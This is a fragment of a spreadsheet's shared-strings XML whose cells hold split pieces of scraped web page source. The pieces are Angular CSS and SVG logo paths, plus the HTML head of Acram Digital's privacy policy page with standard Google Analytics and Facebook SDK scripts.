1440px){.wrapper[_ngcontent-sc53]{padding-left:0;padding-right:0;margin:0 auto;width:1265px}}.header[_ngcontent-sc53]{position:fixed;z-index:10;top:0;width:100vw;height:108px;box-sizing:border-box;transition:all .3s;padding:6px 0;display:flex;justify-content:center;flex-wrap:wrap}.header[_ngcontent-sc53]   .logo_white[_ngcontent-sc53]{display:block}.header--scrolled[_ngcontent-sc53]{background:#fff;box-shadow:0 0 15px #c0c7ff1a}.header--scrolled[_ngcontent-sc53]   .menu_link_dark_mode[_ngcontent-sc53]{color:#000}.header--scrolled[_ngcontent-sc53]   .logo_white[_ngcontent-sc53]{display:none}.header--short[_ngcontent-sc53]{height:52px}.header[_ngcontent-sc53]   .logo[_ngcontent-sc53]{display:block;width:160px}.header[_ngcontent-sc53]   .logo[_ngcontent-sc53] &gt; svg[_ngcontent-sc53]{height:40px;width:inherit}.header__wrapper[_ngcontent-sc53]{width:100%;max-width:1200px;display:flex;box-sizing:border-box;justify-content:space-between;align-items:center}.header-desktop[_ngcontent-sc53], .header__links[_ngcontent-sc53], .header__login[_ngcontent-sc53]{display:none}.header-sing-up[_ngcontent-sc53]{width:100%;cursor:pointer}.header[_ngcontent-sc53]   .menu__items[_ngcontent-sc53]{max-width:890px;margin:0 auto;padding-bottom:20px}.header[_ngcontent-sc53]   .menu__item[_ngcontent-sc53]{margin-bottom:42px;margin-left:16px}.header[_ngcontent-sc53]   .menu__title[_ngcontent-sc53]{margin-bottom:24px;font-family:Merriweather;font-style:normal;font-weight:700;font-size:32px;line-height:40px;display:flex;color:#26357a}.header[_ngcontent-sc53]   .menu__links[_ngcontent-sc53]{display:flex}.header[_ngcontent-sc53]   .btn-menu[_ngcontent-sc53]{display:flex;justify-content:space-between;color:#000;background-color:transparent;cursor:pointer;transition: right .23s;z-index:5}.header[_ngcontent-sc53]   .hidden-menu[_ngcontent-sc53]{display:none;position:fixed;z-index:10;height:100vh;list-style:none;padding-top:0;margin:0;box-sizing:border-box;background:rgba(53,62,108,.35);transition:all .4s;top:51px;right:0;left:0}.header[_ngcontent-sc53]   .hidden-menu-content[_ngcontent-sc53]{border-radius:0 0 24px</t>
  </si>
  <si>
    <t>24px;background-color:#fff;padding:20px 28px 28px;transition:height .4s;overflow:hidden}.header[_ngcontent-sc53]   .hidden-menu-content-row[_ngcontent-sc53]{display:flex;justify-content:space-evenly}.header[_ngcontent-sc53]   .hidden-menu-content-row-login[_ngcontent-sc53]{font-family:Lato;font-style:normal;font-weight:400;font-size:16px;line-height:24px;color:#2b2e3f}.header[_ngcontent-sc53]   .hidden-menu-content-row-sing-up[_ngcontent-sc53]{padding:0 24px}.header[_ngcontent-sc53]   .hidden-menu-content-column[_ngcontent-sc53]{display:flex;flex-direction:column}.header[_ngcontent-sc53]   .hidden-menu-content-column-second[_ngcontent-sc53]{margin-top:20px;border-top:1px solid #5055BE}.header[_ngcontent-sc53]   .hidden-menu-content-column[_ngcontent-sc53] &gt; a[_ngcontent-sc53]{margin-top:24px}.header[_ngcontent-sc53]   .hidden-menu-content-column[_ngcontent-sc53]   .personal-link[_ngcontent-sc53]{font-family:Lato;font-style:normal;font-weight:700;font-size:16px;line-height:24px;display:flex;color:#777d97;text-decoration:none;transition:all .2s;cursor:pointer}.header[_ngcontent-sc53]   .hidden-menu-content-column[_ngcontent-sc53]   .personal-link[_ngcontent-sc53] &gt; span[_ngcontent-sc53]{margin-left:14px}.header[_ngcontent-sc53]   .hidden-menu-content-column[_ngcontent-sc53]   .personal-link[_ngcontent-sc53]:hover   a[_ngcontent-sc53]{color:#fc2870}.header[_ngcontent-sc53]   .hidden-menu-content-info[_ngcontent-sc53]{display:flex;align-items:center;margin-left:-12px;padding-top:16px;color:#2b2e3f;cursor:pointer;text-decoration:none}.header[_ngcontent-sc53]   .hidden-menu-content-info[_ngcontent-sc53]:hover{color:#26357a}.header[_ngcontent-sc53]   .hidden-menu-content-info[_ngcontent-sc53]   .avatar[_ngcontent-sc53]{margin-right:12px}.header[_ngcontent-sc53]   .hidden-menu-content-info[_ngcontent-sc53]     ik-personal-image&gt;img{height:64px}.header[_ngcontent-sc53]   .button-sing-up[_ngcontent-sc53]{border-radius:16px;height:40px;font-family:Lato;font-style:normal;font-weight:400;font-size:16px;line-height:24px;text-align:center;color:#5055be;border:1px solid #5055BE;cursor:pointer}.header[_ngcontent-sc53]   .button-sing-up[_ngcontent-sc53]:hover{opacity:.8}.header[_ngcontent-sc53]   .menu-link[_ngcontent-sc53]{font-family:Lato;font-style:normal;font-weight:700;font-size:16px;line-height:24px;color:#2b2e3f;text-decoration:none;cursor:pointer}.header[_ngcontent-sc53]   .menu-link[_ngcontent-sc53]:hover, .header[_ngcontent-sc53]   .menu-link.special[_ngcontent-sc53]{color:#fc2870}.header[_ngcontent-sc53]   .menu-link.special[_ngcontent-sc53]:hover{color:#26357a}.header[_ngcontent-sc53]   .menu-link[_ngcontent-sc53] &gt; span[_ngcontent-sc53]{margin-left:8px;padding:5px 8px;font-family:inherit;font-style:inherit;font-weight:inherit;font-size:12px;line-height:12px;color:#fff;background:#23CEA3;border-radius:24px}.header[_ngcontent-sc53]   .menu_link_dark_mode[_ngcontent-sc53]{color:#fff}.header[_ngcontent-sc53]   .menu_link_dark_mode[_ngcontent-sc53]:hover, .header[_ngcontent-sc53]   .menu_link_dark_mode.special[_ngcontent-sc53]{color:#fc2870}.header[_ngcontent-sc53]   .menu_link_dark_mode.special[_ngcontent-sc53]:hover{color:#26357a}.header[_ngcontent-sc53]   .menu_link_dark_mode--scrolled[_ngcontent-sc53]{color:#2b2e3f}.hidden-menu-ticker[_ngcontent-sc53], .cross[_ngcontent-sc53]{display:none}.hidden-menu-ticker[_ngcontent-sc53]:checked ~ .hidden-menu[_ngcontent-sc53]{display:block}.hidden-menu-ticker[_ngcontent-sc53]:checked ~ .btn-menu[_ngcontent-sc53]   .cross[_ngcontent-sc53]{display:block}.hidden-menu-ticker[_ngcontent-sc53]:checked ~ .btn-menu[_ngcontent-sc53]   .burger[_ngcontent-sc53]{display:none}.hidden-menu-ticker[_ngcontent-sc53]:checked ~ .overlay[_ngcontent-sc53]{display:block}@media only screen and (min-width: 1024px){.header[_ngcontent-sc53]{height:auto}.header__wrapper[_ngcontent-sc53]{height:67px;box-sizing:border-box;padding-left:36px;padding-right:21px}.header__wrapper-mobile[_ngcontent-sc53]{display:none}.header__wrapper-desktop[_ngcontent-sc53]{position:relative;display:flex;justify-content:flex-end}.header__wrapper-desktop[_ngcontent-sc53]:after{content:"";position:absolute;top:0;right:0;width:890px;background:#5055BE;height:1px}.header[_ngcontent-sc53]   .hidden-menu-content-info[_ngcontent-sc53]{display:flex;align-items:center;margin-left:-12px;padding-top:0}.header[_ngcontent-sc53]   .hidden-menu-content-info[_ngcontent-sc53]     ik-personal-image&gt;img{height:44px}.header__links[_ngcontent-sc53], .header__login[_ngcontent-sc53]{display:block}.header__links[_ngcontent-sc53] &gt; a[_ngcontent-sc53]{margin-right:24px}.header__login[_ngcontent-sc53] &gt; a[_ngcontent-sc53]{text-decoration:none;cursor:pointer;margin-right:21px;color:#353e6c}.header__login[_ngcontent-sc53] &gt; a[_ngcontent-sc53]:hover{opacity:.8}.header__login[_ngcontent-sc53] &gt; a[_ngcontent-sc53]   .email[_ngcontent-sc53]{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;max-width:200px}.header__login[_ngcontent-sc53] &gt; button[_ngcontent-sc53]{padding:8px 24px}.header__btn[_ngcontent-sc53]{display:none}.logo__desk[_ngcontent-sc53]{display:block}.logo__mobile[_ngcontent-sc53]{display:none}.hidden-menu[_ngcontent-sc53]{top:95px;height:100%}.menu[_ngcontent-sc53]{display:none}}&lt;/style&gt;&lt;style ng-transition="serverApp"&gt;.btn[_ngcontent-sc51]{display:flex;justify-content:center;align-items:center;height:64px;margin-top:48px;border:1px solid #D40035;box-sizing:border-box;font-weight:700;font-size:24px;line-height:29px;background:#D40035;color:#fff;transition:color .3s,background-color .3s;cursor:pointer;text-decoration:none}.btn[_ngcontent-sc51]:hover{background:#fff;color:#d40035}.btn[_ngcontent-sc51]:hover   .btn-arrow[_ngcontent-sc51]   path[_ngcontent-sc51]{fill:#d40035}.btn--long[_ngcontent-sc51]{font-size:16px}.btn__text[_ngcontent-sc51]{margin-right:12px}.btn-arrow[_ngcontent-sc51]{margin-top:5px;display:block}.btn-arrow[_ngcontent-sc51]   path[_ngcontent-sc51]{transition:fill .3s;fill:#fff}@media only screen and (min-width: 640px){.btn[_ngcontent-sc51]{width:320px;margin:48px auto 0}.btn--long[_ngcontent-sc51]{font-size:24px;width:420px}}.wrapper[_ngcontent-sc51]{padding-left:16px;padding-right:16px}@media only screen and (min-width: 640px){.wrapper[_ngcontent-sc51]{padding-left:24px;padding-right:24px}}@media only screen and (min-width: 1200px){.wrapper[_ngcontent-sc51]{padding-left:88px;padding-right:88px}}@media only screen and (min-width: 1440px){.wrapper[_ngcontent-sc51]{padding-left:0;padding-right:0;margin:0 auto;width:1265px}}.footer[_ngcontent-sc51]{box-sizing:border-box;background:linear-gradient(180deg,#FFF9F9 0%,rgba(255,255,255,.1) 100%),linear-gradient(90deg,#FFECF7 9.27%,#FEF1DD 59.43%,#FFEAEA 98.94%);color:#2b2e3f;padding-top:32px;padding-bottom:32px;border-radius:16px}.footer__logo[_ngcontent-sc51]{margin-bottom:20px;height:40px;width:200px}.footer__socials[_ngcontent-sc51]{display:none;margin-bottom:56px}.footer__socials-mobile[_ngcontent-sc51]{display:flex;margin-bottom:40px}.footer__social[_ngcontent-sc51]{display:block;margin-right:16px;cursor:pointer}.footer__social[_ngcontent-sc51]:hover{opacity:.6}.footer__learn[_ngcontent-sc51], .footer__more[_ngcontent-sc51], .footer__contacts[_ngcontent-sc51]{margin-bottom:32px;font-family:Lato;font-style:normal}.footer__title[_ngcontent-sc51]{margin-bottom:24px;font-weight:700;font-size:24px;line-height:29px}.footer__link[_ngcontent-sc51]{width:80%;display:block;margin-bottom:8px;font-family:Lato;font-style:normal;font-weight:400;font-size:16px;line-height:19px;text-decoration-line:underline;color:#2b2e3f;cursor:pointer}.footer__link[_ngcontent-sc51]:hover{text-decoration-line:none}.footer__addition-text[_ngcontent-sc51]{padding-left:16px;padding-right:16px;height:16px;width:100%;font-family:Lato;font-style:normal;font-weight:400;font-size:12px;line-height:16px;letter-spacing:.4px;color:#2b2e3f}.footer__newsletter[_ngcontent-sc51]{margin-bottom:40px}.footer__btn[_ngcontent-sc51]{text-align:center;width:288px;padding-top:12px;padding-bottom:12px;margin-bottom:16px;font-family:Lato;font-style:normal;font-weight:700;font-size:24px;line-height:32px;color:#fff;background-color:#5055be;cursor:pointer;transition:color .4s;border-radius:16px}.footer__btn[_ngcontent-sc51]:hover{color:#26357a}.footer__btn[_ngcontent-sc51]:disabled{opacity:.8;color:#fff;cursor:inherit;background-color:gray}.footer__success[_ngcontent-sc51]{display:flex;width:288px;height:44px;align-items:center;justify-content:center;background:#FFFFFF}.footer__success[_ngcontent-sc51]   p[_ngcontent-sc51]{font-family:Merriweather;font-weight:700;font-size:16px;line-height:20px;color:#2b2e3f}.footer__tick[_ngcontent-sc51]{position:relative;bottom:2px;margin-right:20px;width:7px;height:12px;border-bottom:2px solid #2B2E3F;border-right:2px solid #2B2E3F;transform:rotate(45deg)}.footer[_ngcontent-sc51]   .hidden[_ngcontent-sc51]{display:none}.footer__markets[_ngcontent-sc51]{display:flex;margin-bottom:54px}.footer__market[_ngcontent-sc51]{display:flex;align-items:center;box-sizing:border-box;width:132px;height:40px;margin-right:24px;padding:6px</t>
  </si>
  <si>
    <t>10px;background:#FFFFFF;text-decoration:none;cursor:pointer}.footer__market[_ngcontent-sc51]:last-child{margin-right:0}.footer__market[_ngcontent-sc51]:hover   .market__svg[_ngcontent-sc51]   path[_ngcontent-sc51]{fill:#d40035}.footer__text[_ngcontent-sc51]{width:68%;margin-bottom:8px;font-family:Lato;font-style:normal;font-weight:400;font-size:16px;line-height:20px;color:#2b2e3f}.footer__text--small[_ngcontent-sc51]{display:block;font-size:10px;line-height:12px;margin-bottom:10px}.footer__line[_ngcontent-sc51]{margin:0 0 32px;border:0;border-bottom:1px solid #2B2E3F}.footer__info[_ngcontent-sc51]{font-family:Lato;font-weight:400;font-size:16px;line-height:16px;color:#2b2e3f}.footer__info[_ngcontent-sc51]   a[_ngcontent-sc51]{display:inline}.footer__info[_ngcontent-sc51]:first-child{margin-bottom:56px}.market__svg[_ngcontent-sc51]{margin-right:9px}@media only screen and (min-width: 720px){.footer__top[_ngcontent-sc51], .footer__center[_ngcontent-sc51], .footer__bottom[_ngcontent-sc51]{display:flex;justify-content:space-between}.footer__socials[_ngcontent-sc51]{display:flex;margin-bottom:56px}.footer__socials-mobile[_ngcontent-sc51]{display:none}}@media only screen and (min-width: 1024px){.footer[_ngcontent-sc51]{padding-top:40px}.footer__logo[_ngcontent-sc51]{width:230px}.footer__socials[_ngcontent-sc51]{margin-top:16px}.footer__left[_ngcontent-sc51]{display:flex;width:100%;justify-content:space-between}.footer__right[_ngcontent-sc51]{display:flex;flex-direction:column}.footer__download[_ngcontent-sc51]{order:1}.footer__newsletter[_ngcontent-sc51]{order:2}.footer__form[_ngcontent-sc51]{display:flex;flex-direction:column}.footer__form--loading[_ngcontent-sc51]{opacity:.6}.footer__btn[_ngcontent-sc51]{width:100%}}&lt;/style&gt;&lt;style ng-transition="serverApp"&gt;.name-input[_ngcontent-sc50]{position:relative;margin-top:5px;margin-bottom:10px;max-width:320px;width:100%}.name-input[_ngcontent-sc50]   input[_ngcontent-sc50]{width:100%;height:48px;padding-left:20px;font-family:Lato,Raleway;font-size:14px;line-height:18px;box-sizing:border-box;color:#353e6c;background:#FFFFFF;border:1px solid #fff;border-radius:21px}.name-input[_ngcontent-sc50]   input.ng-invalid.ng-touched.focusout[_ngcontent-sc50]{border:1px solid #EB001B}.name-input[_ngcontent-sc50]   input.ng-invalid.ng-touched.focusout[_ngcontent-sc50] + .label[_ngcontent-sc50]{color:#eb001b}.name-input[_ngcontent-sc50]   input[_ngcontent-sc50]:focus, .name-input[_ngcontent-sc50]   input[_ngcontent-sc50]:active, .name-input[_ngcontent-sc50]   input.fill[_ngcontent-sc50]{outline:none}.name-input[_ngcontent-sc50]   input[_ngcontent-sc50]:focus + .label[_ngcontent-sc50], .name-input[_ngcontent-sc50]   input[_ngcontent-sc50]:active + .label[_ngcontent-sc50], .name-input[_ngcontent-sc50]   input.fill[_ngcontent-sc50] + .label[_ngcontent-sc50]{font-size:12px;top:-20px}.name-input[_ngcontent-sc50]   input[_ngcontent-sc50]:-webkit-autofill, .name-input[_ngcontent-sc50]   input[_ngcontent-sc50]:-webkit-autofill:hover, .name-input[_ngcontent-sc50]   input[_ngcontent-sc50]    [_ngcontent-sc50]:-webkit-autofill:focus{border:none;border-bottom:2px solid #fff;-webkit-text-fill-color:#fff;-webkit-box-shadow:5px 5px 5px 35px</t>
  </si>
  <si>
    <t>#fff inset!important}.name-input[_ngcontent-sc50]   .label[_ngcontent-sc50]{position:absolute;left:20px;top:10px;font-family:Lato;color:#2b2e3f;font-size:18px;line-height:140%;transition:all .2s;cursor:text}&lt;/style&gt;&lt;/head&gt;
&lt;body&gt;
  &lt;ik-root _nghost-sc16="" ng-version="15.0.4" ng-server-context="ssg"&gt;&lt;router-outlet _ngcontent-sc16=""&gt;&lt;/router-outlet&gt;&lt;ik-route-privacy _nghost-sc201=""&gt;&lt;ik-privacy _ngcontent-sc201="" _nghost-sc200=""&gt;&lt;ik-main-header _ngcontent-sc200="" _nghost-sc53=""&gt;&lt;header _ngcontent-sc53="" class="header"&gt;&lt;div _ngcontent-sc53="" class="wrapper header__wrapper"&gt;&lt;a _ngcontent-sc53="" routerlink="/" class="logo" href="/"&gt;&lt;svg _ngcontent-sc53="" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 269 75" fill="none"&gt;&lt;path _ngcontent-sc53="" fill-rule="evenodd" clip-rule="evenodd" d="M264.893 22.3043C265.847 21.5575 267.2 21.6737 268.272 22.0852C268.968 22.2205 268.278 22.9825 268.229 23.4017C267.539 23.1045 266.76 22.7539 266.007 23.0225C265.439 23.1997 265.211 24.0475 265.712 24.4228C266.52 25.0115 267.594 25.1258 268.352 25.806C269.332 26.5871 269.166 28.3246 268.086 28.94C266.792 29.6754 265.171 29.3724 263.927 28.679C264.07 28.2865 264.224 27.8959 264.371 27.5054C265.197 27.9645 266.221 28.3837 267.156 27.9912C267.701 27.7854 267.844 26.9624 267.356 26.6176C266.487 25.966 265.26 25.9089 264.529 25.0515C263.83 24.2552 264.07 22.9235 264.893 22.3043Z" fill="black"&gt;&lt;/path&gt;&lt;path _ngcontent-sc53="" fill-rule="evenodd" clip-rule="evenodd" d="M255.973 23.0876C255.973 24.7393 255.971 26.3892 255.973 28.0391C257.004 28.0143 258.179 28.2181 259.05 27.5151C260.326 26.5892 260.279 24.4193 258.97 23.5429C258.101 22.9047 256.975 23.12 255.973 23.0876ZM254.655 21.8854C256.324 21.9845 258.16 21.5596 259.673 22.4741C261.003 23.2324 261.647 24.9032 261.296 26.374C260.974 27.9495 259.484 29.0964 257.913 29.2107C256.827 29.266 255.739 29.2184 254.655 29.2336V21.8854Z" fill="black"&gt;&lt;/path&gt;&lt;path _ngcontent-sc53="" fill-rule="evenodd" clip-rule="evenodd" d="M249.288 21.8872C249.722 21.8853 250.156 21.8853 250.596 21.8853V29.2334H249.288C249.288 26.7853 249.29 24.3353 249.288 21.8872Z" fill="black"&gt;&lt;/path&gt;&lt;path _ngcontent-sc53="" fill-rule="evenodd" clip-rule="evenodd" d="M240.225 21.8853C240.657 21.8853 241.095 21.8853 241.533 21.8872C241.53 23.0817 241.532 24.2762 241.532 25.4727C242.576 24.2762 243.62 23.0798 244.666 21.8853C245.193 21.8853 245.725 21.8853 246.258 21.8872C245.123 23.175 243.989 24.4667 242.854 25.7546C244.044 26.9149 245.231 28.0751 246.422 29.2334C245.873 29.2334 245.327 29.2334 244.78 29.2315C243.7 28.1856 242.616 27.1435 241.532 26.1014C241.532 27.1454 241.53 28.1894 241.532 29.2334H240.225V21.8853Z" fill="black"&gt;&lt;/path&gt;&lt;path _ngcontent-sc53="" fill-rule="evenodd" clip-rule="evenodd" d="M237.114 35.5509C236.411 35.7623 235.761 36.1472 235.245 36.6692C233.324 38.5648 233.402 42.0551 235.441 43.8364C237.078 45.3605 239.844 45.3834 241.511 43.8916C243.648 42.0837 243.69 38.4105 241.627 36.532C240.442 35.4213 238.651 35.0898 237.114 35.5509ZM236.54 33.4476C239.352 32.7179 242.675 33.6038 244.41 36.0234C246.377 38.6963 246.089 42.8 243.658 45.09C240.873 47.8029 235.896 47.7648 233.185 44.9681C231.194 42.9657 230.72 39.6908 231.947 37.1684C232.821 35.3223 234.568 33.9448 236.54 33.4476Z" fill="black"&gt;&lt;/path&gt;&lt;path _ngcontent-sc53="" fill-rule="evenodd" clip-rule="evenodd" d="M215.69 33.4304H227.047V35.6213C225.567 35.6194 224.088 35.6194 222.608 35.6213C222.61 39.3726 222.608 43.1258 222.61 46.8789C221.806 46.877 221.004 46.877 220.204 46.8789V35.6213C218.7 35.6194 217.195 35.6194 215.692 35.6213C215.688 34.8898 215.688 34.1601 215.69 33.4304Z" fill="black"&gt;&lt;/path&gt;&lt;path _ngcontent-sc53="" fill-rule="evenodd" clip-rule="evenodd" d="M199.523 36.9417C200.675 34.7984 202.994 33.3848 205.41 33.2266C207.243 33.1181 209.115 33.4591 210.763 34.2802C210.487 34.9603 210.207 35.6386 209.934 36.3206C208.576 35.7281 207.088 35.2995 205.593 35.49C204.19 35.6348 202.798 36.3282 202.028 37.5399C200.94 39.2431 201.039 41.6627 202.369 43.2097C203.173 44.1622 204.379 44.73 205.614 44.8405C207.151 44.9662 208.7 44.61 210.091 43.9622C210.331 44.6404 210.577 45.3168 210.82 45.9931C207.833 47.5934 203.823 47.5648 201.117 45.4006C198.654 43.4402 198.002 39.668 199.523 36.9417Z" fill="black"&gt;&lt;/path&gt;&lt;path _ngcontent-sc53="" fill-rule="evenodd" clip-rule="evenodd" d="M183.954 46.8789V33.4304H192.737C192.735 34.1601 192.735 34.8898 192.737 35.6213C190.605 35.6194 188.475 35.6213 186.343 35.6213V39.3821H192.141C192.139 40.0832 192.139 40.7843 192.141 41.4854H186.343V44.6937H192.737C192.735 45.4215 192.735 46.1492 192.737 46.8789C189.809 46.877 186.88 46.877 183.954 46.8789Z" fill="black"&gt;&lt;/path&gt;&lt;path _ngcontent-sc53="" fill-rule="evenodd" clip-rule="evenodd" d="M169.218 33.4304H171.607V44.6937H178.001V46.8789C175.074 46.8789 172.146 46.877 169.218 46.8789V33.4304Z" fill="black"&gt;&lt;/path&gt;&lt;path _ngcontent-sc53="" fill-rule="evenodd" clip-rule="evenodd" d="M154.483 33.4304H156.872V44.6937C159.002 44.6937 161.134 44.6956 163.266 44.6937C163.264 45.4215 163.264 46.1492 163.266 46.8789C160.338 46.877 157.412 46.8789 154.485 46.8789C154.483 42.3961 154.485 37.9133 154.483 33.4304Z" fill="black"&gt;&lt;/path&gt;&lt;path _ngcontent-sc53="" fill-rule="evenodd" clip-rule="evenodd" d="M138.556 33.4304H147.342C147.34 34.1601 147.34 34.8898 147.342 35.6213C145.208 35.6213 143.075 35.6194 140.941 35.6213C140.939 36.8749 140.939 38.1285 140.939 39.3821C142.875 39.3802 144.808 39.3821 146.744 39.3802C146.742 40.0832 146.742 40.7843 146.744 41.4854H140.941C140.939 42.5561 140.939 43.6249 140.941 44.6937H147.342C147.34 45.4215 147.34 46.1492 147.342 46.8789C144.412 46.8789 141.484 46.877 138.556 46.8789V33.4304Z" fill="black"&gt;&lt;/path&gt;&lt;path _ngcontent-sc53="" fill-rule="evenodd" clip-rule="evenodd" d="M121.235 33.4304H132.584V35.6213C131.105 35.6194 129.627 35.6194 128.151 35.6213V46.8789C127.347 46.877 126.546 46.877 125.744 46.8789V35.6213C124.241 35.6213 122.738 35.6194 121.233 35.6213C121.233 34.8898 121.233 34.1601 121.235 33.4304Z" fill="black"&gt;&lt;/path&gt;&lt;path _ngcontent-sc53="" fill-rule="evenodd" clip-rule="evenodd" d="M103.768 33.3602C104.018 33.3583 104.273 33.3602 104.526 33.3602C107.308 36.2465 110.091 39.129 112.873 42.0153C112.871 39.1538 112.871 36.2923 112.873 33.4307H115.256V46.9745C115.041 46.9726 114.827 46.9726 114.616 46.9726C111.798 44.1625 108.973 41.3638 106.157 38.5556C106.155 41.3295 106.157 44.1034 106.157 46.8792C105.361 46.8773 104.563 46.8773 103.768 46.8792V33.3602Z" fill="black"&gt;&lt;/path&gt;&lt;path _ngcontent-sc53="" fill-rule="evenodd" clip-rule="evenodd" d="M93.7012 33.4304H96.0845V46.8789C95.2882 46.877 94.4956 46.877 93.7012 46.8789V33.4304Z" fill="black"&gt;&lt;/path&gt;&lt;path _ngcontent-sc53="" fill-rule="evenodd" clip-rule="evenodd" d="M27.4914 2.4774C28.063 0.789431 29.9548 -0.178388 31.6751 0.0273692C33.3555 0.155015 34.9825 1.46005 35.1368 3.19755C35.2054 4.474 34.5176 5.60947 34.0699 6.76019C33.8718 7.23076 33.9328 7.82327 34.3062 8.19096C34.6948 8.60247 35.2873 8.70535 35.8303 8.69011C38.9224 8.67677 42.0125 8.69773 45.1027 8.67868C45.1236 10.1209 45.1103 11.5631 45.1103 13.0053C44.3711 13.032 43.6033 12.8948 42.8832 13.1025C42.3345 13.3063 42.3021 13.9579 42.3116 14.4532C42.3231 18.134 42.3059 21.8166 42.3231 25.4974C42.3383 25.8956 42.2468 26.2842 42.1268 26.6614C41.0809 26.4938 40.1912 25.8422 39.151 25.6346C37.4801 25.0878 35.5788 25.8727 34.5977 27.2882C33.1459 29.262 33.365 32.2874 35.1654 33.9734C36.2227 34.9965 37.8459 35.4385 39.2519 34.947C40.2598 34.7374 41.1209 34.0915 42.144 33.9582C42.2602 34.3659 42.3383 34.785 42.3231 35.2118C42.3078 36.9664 42.3211 38.7211 42.3154 40.4757C39.5892 40.4757 36.8629 40.4719 34.1366 40.4757C33.4393 40.4567 32.6049 40.7177 32.3572 41.4416C32.119 42.1332 32.5725 42.781 32.8163 43.3982C33.2869 44.4842 33.7689 45.7435 33.2374 46.898C32.3724 48.9841 29.5985 49.75 27.6591</t>
  </si>
  <si>
    <t>48.7384C26.4607 48.163 25.5577 46.8828 25.6606 45.5225C25.7825 44.4365 26.3064 43.4611 26.716 42.4666C26.9294 41.977 26.878 41.3502 26.476 40.973C26.0397 40.5291 25.3786 40.4681 24.7899 40.47C20.9167 40.4795 17.0435 40.4719 13.1704 40.4738C13.1837 36.6254 13.1704 32.7789 13.1894 28.9305C13.1894 28.3494 13.1627 27.7093 12.7608 27.2482C12.4235 26.8272 11.812 26.7015 11.3167 26.8882C10.1812 27.313 9.08571 27.9817 7.83974 27.9912C6.3099 27.9455 5.02392 26.7091 4.64099 25.2745C4.25043 23.9123 4.55716 22.3444 5.52307 21.2908C6.1975 20.5421 7.22057 20.0753 8.23792 20.1953C9.32576 20.3382 10.2936 20.8888 11.3052 21.2737C11.8063 21.4718 12.4312 21.3384 12.7684 20.9079C13.1704 20.4392 13.1913 19.7915 13.1894 19.2066C13.1742 15.6992 13.1856 12.1937 13.178 8.6863C17.6246 8.69964 22.0713 8.65772 26.5179 8.71297C27.2037 8.73012 28.023 8.56818 28.3735 7.90709C28.7393 7.22695 28.2954 6.50871 28.0268 5.88382C27.5752 4.82646 27.059 3.62811 27.4914 2.4774Z" fill="#FAD644"&gt;&lt;/path&gt;&lt;path _ngcontent-sc53="" fill-rule="evenodd" clip-rule="evenodd" d="M55.9238 7.65734C56.5735 5.9046 58.6291 4.99012 60.4066 5.34448C61.9803 5.59787 63.4282 6.9029 63.5235 8.54895C63.5692 9.92448 62.7233 11.0904 62.3594 12.365C62.167 13.3252 63.1691 14.011 64.0379 13.9558C67.6881 13.971 71.3403 13.9539 74.9925 13.9558C74.9925 17.869 74.9906 21.7803 74.9944 25.6934C75.0135 26.3907 74.7848 27.2347 74.0685 27.511C73.3445 27.7796 72.6606 27.2976 72.0128 27.0404C70.9212 26.5603 69.6295 26.1069 68.4845 26.6898C66.3983 27.6329 65.7163 30.4887 66.8537 32.3996C67.4538 33.4855 68.654 34</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;!--[if IE 8 ]&gt;&lt;html class="ie ie8" lang="en"&gt; &lt;! [endif]--&gt;
&lt;!--[if</t>
  </si>
  <si>
    <t>(gte IE 9)|!(IE)]&gt;&lt;!--&gt;&lt;html class="no-js" lang="en" xmlns:fb="https://www.facebook.com/2008/fbml" xmlns:addthis="https://www.addthis.com/help/api-spec"&gt; &lt;!--&lt;![endif]--&gt;
&lt;head&gt;
&lt;meta charset="UTF-8" /&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"&gt;
&lt;meta name="description" content="Acram Digital - We provide the best digitized board games" /&gt;
&lt;meta name="keywords" content="acram digital board game" /&gt;
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-88361826-1"&gt;&lt;/script&gt;_x005F_x000D_
&lt;script&gt;_x005F_x000D_
  window.dataLayer = window.dataLayer || [];_x005F_x000D_
  function gtag(){dataLayer.push(arguments);}_x005F_x000D_
  gtag('js', new Date());_x005F_x000D_
_x005F_x000D_
  gtag('config', 'UA-88361826-1');_x005F_x000D_
&lt;/script&gt;
&lt;link rel="shortcut icon" href="http://acram.eu/wp-content/uploads/2018/04/cropped-Acram_Logo_Square_bg.png" type="image/x-icon" /&gt;	
&lt;title&gt;Privacy Policy &amp;#8211; Acram Digital&lt;/title&gt;
&lt;script&gt;(function(d, s, id){
				 var js, fjs = d.getElementsByTagName(s)[0];
				 if (d.getElementById(id))</t>
  </si>
  <si>
    <t>{return;}
				 js = d.createElement(s); js.id = id;
				 js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&amp;version=v2.6";
				 fjs.parentNode.insertBefore(js, fjs);
			   }(document, 'script', 'facebook-jssdk'));&lt;/script&gt;
&lt;script id="mfn-dnmc-config-js"&gt;
//&lt;![CDATA [
window.mfn_ajax = "https://acram.eu/wp-admin/admin-ajax.php";
window.mfn = {mobile_init:1240,nicescroll:40,parallax:"translate3d",responsive:1,retina_disable:0};
window.mfn_prettyphoto = {disable:false,disableMobile:false,title:false,style:"pp_default",width:0,height:0};
window.mfn_sliders = {blog:0,clients:0,offer:0,portfolio:0,shop:0,slider:0,testimonials:0};
//]]&gt;
&lt;/script&gt;
&lt;link rel="dns-prefetch" href="//ws.sharethis.com" /&gt;
&lt;link rel="dns-prefetch" href="//fonts.googleapis.com" /&gt;
&lt;link rel="dns-prefetch" href="//maxcdn.bootstrapcdn.com" /&gt;
&lt;link rel="dns-prefetch" href="//s.w.org" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Acram Digital &amp;raquo; Feed" href="https://acram.eu/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Acram Digital &amp;raquo; Comments Feed" href="https://acram.eu/comments/feed/" /&gt;
_x005F_x000D_
&lt;script type="text/javascript" data-cfasync="false"&gt;_x005F_x000D_
	var mi_version         = '7.10.4';_x005F_x000D_
	var mi_track_user      = true;_x005F_x000D_
	var mi_no_track_reason = '';_x005F_x000D_
	_</t>
  </si>
  <si>
    <t>x000D_
	var disableStr = 'ga-disable-UA-88361826-1';_x005F_x000D_
_x005F_x000D_
	/ * Function to detect opted out users */_x005F_x000D_
	function __gaTrackerIsOptedOut() {_x005F_x000D_
		return document.cookie.indexOf(disableStr + '=true') &gt; -1;_x005F_x000D_
	}_x005F_x000D_
_x005F_x000D_
	/*</t>
  </si>
  <si>
